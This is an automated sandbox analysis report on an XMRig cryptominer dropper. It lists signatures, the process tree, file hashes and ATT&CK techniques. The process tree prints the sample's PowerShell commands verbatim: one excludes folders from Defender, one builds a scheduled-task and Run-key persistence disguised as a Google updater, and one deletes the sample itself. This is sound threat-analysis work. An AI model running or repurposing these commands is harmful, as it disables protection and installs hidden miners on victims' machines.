Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1677s
  • max time network
    1796s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Y2JYGshMHJGuGREA.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1224
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1164
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2776
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2404
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2728
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1504
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:992
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:2472
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:272
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2388
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2616
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {215398B5-0A5A-4617-AF73-F4201A7FF16A} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:284
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1572

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          182KB

          MD5

          88a762872d30557b0240f158ecb8362f

          SHA1

          e04e073b5a151b940d845df73744171a55e3272f

          SHA256

          74bf2282104721ecd1656da53e7bfec7387011255ba0b0b2ab2bb6978922fba8

          SHA512

          483ba8ae6b5fc70a49c7a6135382e7a17664b3d633e6bdc22bd0282167e3c263ca6338ce0b295d0181a3ebe63b149d4b0594e52355db492f5b524d97f6991ba4

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          168KB

          MD5

          133d536f6b12558cb2f744308041b862

          SHA1

          9f8481a988962374809c8ec6ad46fdb810abd8d8

          SHA256

          6b4d6615d7f77f4196a3ea8420411f5214e94d4d6ade5c0cfe2f14f951f9257e

          SHA512

          3a8ed5c18571365eb31974c70803f5e9fac4333ad14f828afdb4514241db139e832889d37dc6648f2ec2629d64b8c49fb7d5ddcd7219873433da6241383891c0

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          1fbd8b338a538333f1caeec0a11a7eca

          SHA1

          4b70c84eeb122481f77b5efb374c6c570a7c08e6

          SHA256

          63c47a507b34e0de3e2ee57a069fff92a038ff1be1119441cc5ee86a49b8e803

          SHA512

          cc98ea2e038390ace959593661168d47ef7a3b0e752f06cbbcef404774242de5f0af1ec52a7ba5e8b9d16a2e05cfe090946b1d62847019aae8bdaa48fc448a1c

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          200KB

          MD5

          0a628b52143d11e7c200b8c6c21b2db0

          SHA1

          215aa8578d8321ce281e823e50a5062d25d293d4

          SHA256

          383b480aef191a4e3e72960d17f420a5fb5ce52a63ebe8ceb806799dad7b927b

          SHA512

          5c1d1054a0aa27b06b403cfca98594e0c5af059abca4b2a17cc3fc7b66966eda5e80506f3cca6e0b07f57f6003bb0eb590855244663cf37ea4b2dd26b0655693

        • memory/272-73-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/272-69-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/284-64-0x000000013F3B0000-0x000000013F5C1000-memory.dmp
          Filesize

          2.1MB

        • memory/284-43-0x000000013F3B0000-0x000000013F5C1000-memory.dmp
          Filesize

          2.1MB

        • memory/1164-0-0x000000013F5D0000-0x000000013F7E1000-memory.dmp
          Filesize

          2.1MB

        • memory/1164-29-0x000000013F5D0000-0x000000013F7E1000-memory.dmp
          Filesize

          2.1MB

        • memory/1988-38-0x0000000002840000-0x00000000028C0000-memory.dmp
          Filesize

          512KB

        • memory/1988-37-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-36-0x0000000002840000-0x00000000028C0000-memory.dmp
          Filesize

          512KB

        • memory/1988-35-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/1988-39-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2228-45-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2228-51-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2228-49-0x0000000000F60000-0x0000000000FE0000-memory.dmp
          Filesize

          512KB

        • memory/2228-50-0x0000000000F60000-0x0000000000FE0000-memory.dmp
          Filesize

          512KB

        • memory/2228-48-0x0000000000F60000-0x0000000000FE0000-memory.dmp
          Filesize

          512KB

        • memory/2228-46-0x0000000000F60000-0x0000000000FE0000-memory.dmp
          Filesize

          512KB

        • memory/2228-47-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2236-54-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2236-52-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2236-57-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2236-56-0x0000000000D30000-0x0000000000DB0000-memory.dmp
          Filesize

          512KB

        • memory/2236-55-0x0000000000D30000-0x0000000000DB0000-memory.dmp
          Filesize

          512KB

        • memory/2236-53-0x0000000000D30000-0x0000000000DB0000-memory.dmp
          Filesize

          512KB

        • memory/2388-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-66-0x00000000002F0000-0x0000000000310000-memory.dmp
          Filesize

          128KB

        • memory/2388-65-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-68-0x0000000000B40000-0x0000000000B60000-memory.dmp
          Filesize

          128KB

        • memory/2388-67-0x0000000000AE0000-0x0000000000B00000-memory.dmp
          Filesize

          128KB

        • memory/2388-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-70-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-75-0x0000000000AE0000-0x0000000000B00000-memory.dmp
          Filesize

          128KB

        • memory/2388-76-0x0000000000B40000-0x0000000000B60000-memory.dmp
          Filesize

          128KB

        • memory/2388-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2388-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2404-22-0x00000000021E0000-0x00000000021E8000-memory.dmp
          Filesize

          32KB

        • memory/2404-26-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2404-24-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2404-19-0x000000001B2B0000-0x000000001B592000-memory.dmp
          Filesize

          2.9MB

        • memory/2404-20-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2404-21-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2404-27-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2404-25-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2404-23-0x000007FEF4BB0000-0x000007FEF554D000-memory.dmp
          Filesize

          9.6MB

        • memory/2776-5-0x000000001B170000-0x000000001B452000-memory.dmp
          Filesize

          2.9MB

        • memory/2776-8-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2776-6-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2776-9-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2776-11-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2776-12-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2776-13-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp
          Filesize

          9.6MB

        • memory/2776-7-0x0000000002310000-0x0000000002318000-memory.dmp
          Filesize

          32KB

        • memory/2776-10-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB